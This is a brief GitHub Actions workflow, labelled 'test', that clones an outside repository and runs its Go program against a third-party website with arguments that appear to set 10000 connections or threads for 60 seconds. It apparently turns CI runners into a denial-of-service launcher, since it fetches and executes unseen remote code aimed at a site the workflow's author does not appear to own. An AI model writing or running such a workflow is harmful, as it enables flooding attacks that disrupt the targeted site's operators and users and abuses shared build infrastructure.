name: test

on: [workflow_dispatch]

jobs:
  clone-and-run:
    runs-on: ubuntu-latest
    
    steps:
    - name: Checkout current repository
      uses: actions/checkout@v3
      
    - name: Clone target repository
      run: git clone https://github.com/16ssarmy/XXX.git
      
    - name: Set up Go
      uses: actions/setup-go@v3
      with:
        go-version: '1.19'
        
    - name: run go
      run: |
        cd XXX
        go run main.go https://warawara.pages.dev/ 10000 60